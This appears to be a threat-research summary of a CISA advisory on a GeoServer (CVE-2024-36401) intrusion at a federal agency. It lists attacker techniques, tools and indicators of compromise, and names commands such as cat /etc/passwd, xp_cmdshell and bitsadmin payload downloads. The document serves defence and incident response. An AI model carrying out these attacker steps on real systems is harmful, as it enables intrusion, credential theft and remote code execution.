Threat Research

CISA Shares Lessons Learned from an Incident Response Engagement

CISA
CISA Shares Lessons Learned from an Incident Response Engagement

CISA investigated a multi-week compromise of a U.S. federal civilian executive branch agency where threat actors exploited CVE-2024-36401 in public-facing GeoServer instances to gain RCE, upload web shells (including China Chopper), establish C2 using Stowaway, move laterally to a web and SQL server, and persist using cron jobs, BITS abuse, and valid accounts. The advisory emphasizes prompt patching, practicing incident response plans, centralized out-of-band logging, and provides TTPs and IOCs to help organizations defend against similar attacks. #CVE-2024-36401 #GeoServer #Stowaway #ChinaChopper

Keypoints

  • Threat actors exploited GeoServer vulnerability CVE-2024-36401 to gain initial RCE on two public-facing GeoServer instances (GeoServer 1 on July 11, 2024, and GeoServer 2 on July 24, 2024).
  • Actors used open-source tools and a VPS for resource development, uploaded web shells (China Chopper and generic PHP shells), and staged tools like RingQ, BusyBox, and Stowaway on a C2 server (45.32.22.62 and 45.17.43.250 observed).
  • Lateral movement occurred from GeoServer to a web server and then to an SQL server; actors enabled xp_cmdshell, used brute force for credentials, and performed discovery with fscan and common OS/network commands.
  • Persistence and defense evasion included web shells, cron jobs, BITS job abuse, valid accounts, indirect command execution via web shells and xp_cmdshell, and attempted use of the dirtycow exploit for privilege escalation.
  • The intrusion remained undetected for ~3 weeks; detection arose from EDR alerts when a suspected malware file (1.txt) was uploaded to the SQL server, prompting containment and CISA engagement.
  • CISA’s lessons highlight failures: delayed patching of KEV-listed CVE-2024-36401, untested/insufficient IRP (including third-party access and change control delays), incomplete EDR coverage on public-facing systems, and inadequate centralized logging.
  • CISA recommends immediate KEV patching, asset discovery and prioritization, practicing and updating IRPs (including third-party access and out-of-band communications), comprehensive logging to an out-of-band SIEM, allowlisting, and phishing-resistant MFA for privileged accounts.

MITRE Techniques

  • [T1595.002 ] Active Scanning: Vulnerability Scanning – The actors identified CVE-2024-36401 using Burp Suite/Burp Scanner and Burp Collaborator; quote: ‘…observed domains linked to Burp Collaborator…originating from the same IP address the cyber threat actors later used to exploit the GeoServer vulnerability…’
  • [T1583.003 ] Acquire Infrastructure: Virtual Private Server – Actors used a commercially available VPS from a cloud provider to gain remote access and conduct operations; quote: ‘…leveraged a commercially available virtual private server (VPS) from a cloud infrastructure provider…’
  • [T1190 ] Exploit Public-Facing Application – Actors exploited CVE-2024-36401 on two GeoServer instances to achieve RCE via eval injection; quote: ‘…exploited CVE 2024-36401…to gain RCE by performing “eval injection”…’
  • [T1059.001 ] Command and Scripting Interpreter: PowerShell – PowerShell was used to download payloads; quote: ‘…used PowerShell to download a payload.’
  • [T1202 ] Indirect Command Execution – Actors executed commands indirectly via .php web shells and xp_cmdshell to evade detection; quote: ‘…employed indirect command execution via .php web shells and xp_cmdshell…’
  • [T1197 ] BITS Jobs – Actors abused Background Intelligence Transfer Service jobs for defense evasion and file transfer; quote: ‘…abused Background Intelligence Transfer Service (BITS) jobs…’
  • [T1053.003 ] Scheduled Task/Job: Cron – Cron jobs were used to establish persistence on compromised hosts; quote: ‘…cron jobs (scheduled commands that run automatically at specified times)…’
  • [T1505.003 ] Server Software Component: Web Shell – Web shells (China Chopper and generic PHP shells) were uploaded to internet-facing hosts for persistence and command execution; quote: ‘…uploaded web shells such as China Chopper…’
  • [T1078 ] Valid Accounts – Threat actors used valid accounts and created accounts (later deleted) to maintain persistence; quote: ‘…used valid accounts for persistence…’
  • [T1068 ] Exploitation for Privilege Escalation – Actors attempted to use the dirtycow public exploit (CVE-2016-5195) to escalate privileges; quote: ‘…attempted to escalate privileges with the publicly available dirtycow tool…’
  • [T1110 ] Brute Force – Brute force techniques were used to obtain passwords for lateral movement and privilege escalation; quote: ‘…primarily relied on brute force techniques to obtain passwords…’
  • [T1087.001 ] Account Discovery: Local Account – Actors used commands like cat /etc/passwd to discover local users; quote: ‘…used cat /etc/passwd…’
  • [T1083 ] File and Directory Discovery – Actors used directory and file listing commands (dir, type) on the SQL server to enumerate files and directories; quote: ‘…used dir c:, dir d:, dir e:, and type c: commands…’
  • [T1046 ] Network Service Discovery – fscan was used to identify SSH listeners, FTP servers, and other services for lateral movement; quote: ‘…used fscan to identify SSH listeners and FTP servers.’
  • [T1057 ] Process Discovery – Actors ran tasklist on the SQL server to enumerate running processes; quote: ‘…used tasklist on the SQL server.’
  • [T1018 ] Remote System Discovery – Actors performed ping sweeps of hosts within specific subnets to find reachable systems; quote: ‘…performed ping sweeps of hosts within specific subnets.’
  • [T1082 ] System Information Discovery – Commands like cat /etc/redhat-release and cat /etc/os-release were used to collect OS information; quote: ‘…used cat /etc/redhat-release and cat /etc/os-release…’
  • [T1016 ] System Network Configuration Discovery – ipconfig was executed to check network configuration on compromised hosts; quote: ‘…used ipconfig to check GeoServer 1’s and the SQL server’s network configurations.’
  • [T1049 ] System Network Connections Discovery – netstat and netstat -ano were used to list network connections for discovery; quote: ‘…executed commands such as netstat to obtain a listing of network connections…’
  • [T1033 ] System Owner/User Discovery – whoami was used on the SQL server to determine the current user context; quote: ‘…used whoami on the SQL server.’
  • [T1105 ] Ingress Tool Transfer – PowerShell and bitsadmin getfile were used to download payloads and tools to compromised hosts; quote: ‘…used PowerShell and bitsadmin getfile to download payloads.’
  • [T1090 ] Proxy – The Stowaway multi-level proxy was used to establish C2 and forward traffic through the web server to access internal resources; quote: ‘…used Stowaway…to establish C2…forwarding traffic from their C2 server through the Web Server.’

Indicators of Compromise

  • [IPv4 ] C2 server IP addresses observed mid-July to early August 2024 – 45.32.22.62, 45.17.43.250
  • [MD5 ] Web shells and tools (mid-July to early August 2024) – 0777EA1D01DAD6DC261A6B602205E2C8 (China Chopper), feda15d3509b210cb05eacc22485a78c (generic PHP web shell)
  • [MD5 ] Exploit and proxy tool hashes – C9F4C41C195B25675BFA860EB9B45945 (Linux exploit/CVE-2016-5195), 64e3a3458b3286caaac821c343d4b208 (Stowaway proxy tool)
  • [MD5 ] Dirtycow and other executables – B7B3647E06F23B9E83D0B1CCE3E71642 (Dirtycow), 20b70dac937377b6d0699a44721acd80 and de778443619f37e2224898a9a800fa78 (unknown downloaded executables)
  • [File names ] Tools and scripts hosted on C2 and uploaded to hosts – examples: RingQ.exe / RingQ.rar (RingQ tool), mm.sh / aa.sh (downloaded shell scripts), Handx.ashx and start_tomcat.jsp (web shells)

Read more: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-266a

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint